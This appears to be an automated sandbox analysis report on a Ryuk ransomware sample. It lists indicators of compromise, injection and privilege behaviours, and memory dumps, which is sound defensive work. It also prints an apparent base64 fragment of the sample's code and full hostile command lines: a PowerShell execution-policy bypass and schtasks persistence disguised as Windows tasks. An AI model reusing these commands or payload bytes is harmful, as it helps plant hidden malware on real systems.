8D/FQSgABCQkDllsHQXaIgBAABoExUCBGgGAAAA6L4kAACDxAyLXaxTi32oiwODwwSJB4PHBFeLP1NmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBFuBwxQAAABfg8cEV4s/U2aLA4PDAokHg8cEigNDiQeDxwSKA0OJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEV4s/uRAAAACBxwgAAABTV1GLP4sDg8MEiQeDxwSLA4PDBIkHg8cEWV9bg8cEgcMIAAAASQ+F1P///1+DxwRbgcPgAAAAX4PHBOjaIgAAg8QEi134iV3Yi13YgTtQRQAAD4QKAAAAuAAAAADpvxkAAItd9Ild2Ill1ItF9FBoRAAAAOinIgAAg8QEi/hbUIldzIlF0IsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEM8D/FQCgABCQkDll1HQXaBwCAABoExUCBGgGAAAA6K8hAACDxAxQi13QU4t9zIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8ME

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1996	powershell.exe
11	880	cmd.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File created	C:\Windows\SysWOW64\FileDriver.sys	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1680 set thread context of 1188	1680	PowerShell.exe	40
PID 1680 set thread context of 880	1680	PowerShell.exe	43
PID 880 set thread context of 944	880	cmd.exe	44

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1140	schtasks.exe
516	schtasks.exe

Modifies data under HKEY_USERS 26 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-64-c7-15-47-68\WpadDecision = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c094a4b2a5a4d701	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script\Settings	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}\WpadDecisionTime = 005f78d4a5a4d701	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}\WpadNetworkName = "Network 3"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-64-c7-15-47-68\WpadDecisionTime = 005f78d4a5a4d701	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script\Settings\JITDebug = "0"	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a00002c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}\3e-64-c7-15-47-68	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-64-c7-15-47-68\WpadDecisionReason = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CA0D698-8BA7-4306-A9BF-3F7C374635D4}\WpadDecision = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-64-c7-15-47-68	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1996	powershell.exe
1832	PowerShell.exe
1680	PowerShell.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
944	svchost.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe
880	cmd.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1832	PowerShell.exe
Token: SeDebugPrivilege	1680	PowerShell.exe
Token: SeDebugPrivilege	1048	PowerShell.exe
Token: SeDebugPrivilege	1316	PowerShell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
880	cmd.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 1140	1996	powershell.exe	31
PID 1996 wrote to memory of 1140	1996	powershell.exe	31
PID 1996 wrote to memory of 1140	1996	powershell.exe	31
PID 1996 wrote to memory of 516	1996	powershell.exe	34
PID 1996 wrote to memory of 516	1996	powershell.exe	34
PID 1996 wrote to memory of 516	1996	powershell.exe	34
PID 676 wrote to memory of 1832	676	taskeng.exe	36
PID 676 wrote to memory of 1832	676	taskeng.exe	36
PID 676 wrote to memory of 1832	676	taskeng.exe	36
PID 676 wrote to memory of 1680	676	taskeng.exe	38
PID 676 wrote to memory of 1680	676	taskeng.exe	38
PID 676 wrote to memory of 1680	676	taskeng.exe	38
PID 676 wrote to memory of 1680	676	taskeng.exe	38
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1188	1680	PowerShell.exe	40
PID 1680 wrote to memory of 1424	1680	PowerShell.exe	42
PID 1680 wrote to memory of 1424	1680	PowerShell.exe	42
PID 1680 wrote to memory of 1424	1680	PowerShell.exe	42
PID 1680 wrote to memory of 1424	1680	PowerShell.exe	42
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 1680 wrote to memory of 880	1680	PowerShell.exe	43
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 880 wrote to memory of 944	880	cmd.exe	44
PID 676 wrote to memory of 1048	676	taskeng.exe	45
PID 676 wrote to memory of 1048	676	taskeng.exe	45
PID 676 wrote to memory of 1048	676	taskeng.exe	45
PID 676 wrote to memory of 1316	676	taskeng.exe	46
PID 676 wrote to memory of 1316	676	taskeng.exe	46
PID 676 wrote to memory of 1316	676	taskeng.exe	46
PID 676 wrote to memory of 1316	676	taskeng.exe	46

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\cs.jpg.ps1
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /tn \Microsoft\Windows\UPnPcwmipcnew\Services /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1"
  2⤵
  - Creates scheduled task(s)
  PID:1140
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /tn \Microsoft\Windows\UPnPcwmiob32\Services /tr "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1"
  2⤵
  - Creates scheduled task(s)
  PID:516

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1044

C:\Windows\system32\taskeng.exe
taskeng.exe {1A4F887C-4E3A-4AD2-B24E-A132A0A243B6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:676
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe
    3⤵
    - Drops file in System32 directory
    PID:1188
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:944
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1316

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/880-82-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/880-83-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/880-84-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/880-87-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/880-89-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download
memory/944-92-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/944-91-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/944-90-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/944-96-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/1048-102-0x000007FEF28D0000-0x000007FEF342D000-memory.dmp

Filesize
11.4MB

Download
memory/1048-103-0x00000000012C0000-0x00000000012C2000-memory.dmp

Filesize
8KB

Download
memory/1048-105-0x00000000012C4000-0x00000000012C7000-memory.dmp

Filesize
12KB

Download
memory/1048-104-0x00000000012C2000-0x00000000012C4000-memory.dmp

Filesize
8KB

Download
memory/1048-109-0x00000000012CB000-0x00000000012EA000-memory.dmp

Filesize
124KB

Download
memory/1188-78-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1188-77-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1188-79-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1188-81-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1316-108-0x0000000000ED0000-0x0000000001B1A000-memory.dmp

Filesize
12.3MB

Download
memory/1316-107-0x0000000000ED0000-0x0000000001B1A000-memory.dmp

Filesize
12.3MB

Download
memory/1316-106-0x0000000000ED0000-0x0000000001B1A000-memory.dmp

Filesize
12.3MB

Download
memory/1680-76-0x0000000012080000-0x000000001276C000-memory.dmp

Filesize
6.9MB

Download
memory/1680-75-0x0000000000E30000-0x0000000001A7A000-memory.dmp

Filesize
12.3MB

Download
memory/1680-74-0x0000000000E30000-0x0000000001A7A000-memory.dmp

Filesize
12.3MB

Download
memory/1680-73-0x0000000000E30000-0x0000000001A7A000-memory.dmp

Filesize
12.3MB

Download
memory/1680-64-0x0000000075201000-0x0000000075203000-memory.dmp

Filesize
8KB

Download
memory/1832-66-0x0000000001272000-0x0000000001274000-memory.dmp

Filesize
8KB

Download
memory/1832-63-0x000007FEED960000-0x000007FEEE4BD000-memory.dmp

Filesize
11.4MB

Download
memory/1832-65-0x0000000001270000-0x0000000001272000-memory.dmp

Filesize
8KB

Download
memory/1832-67-0x0000000001274000-0x0000000001277000-memory.dmp

Filesize
12KB

Download
memory/1832-71-0x000000000127B000-0x000000000129A000-memory.dmp

Filesize
124KB

Download
memory/1996-52-0x000007FEFBBC1000-0x000007FEFBBC3000-memory.dmp

Filesize
8KB

Download
memory/1996-57-0x000000000273B000-0x000000000275A000-memory.dmp

Filesize
124KB

Download
memory/1996-56-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/1996-55-0x0000000002732000-0x0000000002734000-memory.dmp

Filesize
8KB

Download
memory/1996-54-0x0000000002730000-0x0000000002732000-memory.dmp

Filesize
8KB

Download
memory/1996-53-0x000007FEF28D0000-0x000007FEF342D000-memory.dmp

Filesize
11.4MB

Download